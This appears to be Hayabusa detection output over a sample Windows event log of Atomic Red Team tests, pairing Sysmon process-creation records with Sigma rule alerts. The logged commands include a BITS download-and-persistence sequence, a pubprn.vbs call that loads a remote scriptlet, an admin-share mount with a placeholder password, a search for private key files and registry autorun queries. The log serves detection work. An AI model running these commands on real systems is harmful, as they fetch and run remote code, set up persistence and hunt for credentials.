+2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D83E-5D31-0000-0010F0D02E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /create AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" | LID: 0x50951 | PID: 4508 | PGUID: 747F3D96-D83E-5D31-0000-001042D32E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4036 | PGUID: 747F3D96-D83E-5D31-0000-0010A2D72E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via BITS,,../hayabusa-rules/sigma/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 3732 | PGUID: 747F3D96-D83E-5D31-0000-0010AAD92E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via BITS,,../hayabusa-rules/sigma/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7072 | PGUID: 747F3D96-D83E-5D31-0000-001088DE2E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 3204 | PGUID: 747F3D96-D83E-5D31-0000-0010DAE02E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4332 | PGUID: 747F3D96-D83E-5D31-0000-001046E52E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /complete AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" | LID: 0x50951 | PID: 388 | PGUID: 747F3D96-D83F-5D31-0000-0010A2E72E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3760 | PGUID: 747F3D96-D83F-5D31-0000-001001EC2E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /resume AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" | LID: 0x50951 | PID: 3704 | PGUID: 747F3D96-D83F-5D31-0000-001053EE2E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4888 | PGUID: 747F3D96-D83F-5D31-0000-00105EF22E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-D844-5D31-0000-001075082F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | LID: 0x50951 | PID: 2484 | PGUID: 747F3D96-D844-5D31-0000-0010C70A2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2624 | PGUID: 747F3D96-D845-5D31-0000-001098212F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2096 | PGUID: 747F3D96-D849-5D31-0000-0010914D2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | LID: 0x50951 | PID: 3284 | PGUID: 747F3D96-D849-5D31-0000-0010E54F2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | LID: 0x50951 | PID: 6068 | PGUID: 747F3D96-D849-5D31-0000-00103C522F00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,LatMov,Mounted Windows Admin Shares with net.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D84E-5D31-0000-00102C702F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6524 | PGUID: 747F3D96-D859-5D31-0000-0010E68C2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 888 | PGUID: 747F3D96-D859-5D31-0000-0010FB8F2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,../hayabusa-rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /S /D /c"" dir c:\ /b /s .key "" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D859-5D31-0000-001045922F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,../hayabusa-rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: findstr /e .key | Process: C:\Windows\System32\findstr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D859-5D31-0000-00109E932F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,../hayabusa-rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3188 | PGUID: 747F3D96-D87B-5D31-0000-0010D92D3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2888 | PGUID: 747F3D96-D87C-5D31-0000-0010E83B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-D87C-5D31-0000-0010413E3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5984 | PGUID: 747F3D96-D87C-5D31-0000-00107A403100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | LID: 0x50951 | PID: 5256 | PGUID: 747F3D96-D87C-5D31-0000-0010CC423100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5016 | PGUID: 747F3D96-D87C-5D31-0000-001009453100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | LID: 0x50951 | PID: 6208 | PGUID: 747F3D96-D87C-5D31-0000-00105B473100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1680 | PGUID: 747F3D96-D87C-5D31-0000-001097493100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D87C-5D31-0000-0010E94B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1428 | PGUID: 747F3D96-D87C-5D31-0000-0010264E3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" | LID: 0x50951 | PID: 3220 | PGUID: 747F3D96-D87C-5D31-0000-001078503100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D87C-5D31-0000-0010B4523100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D87C-5D31-0000-001006553100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
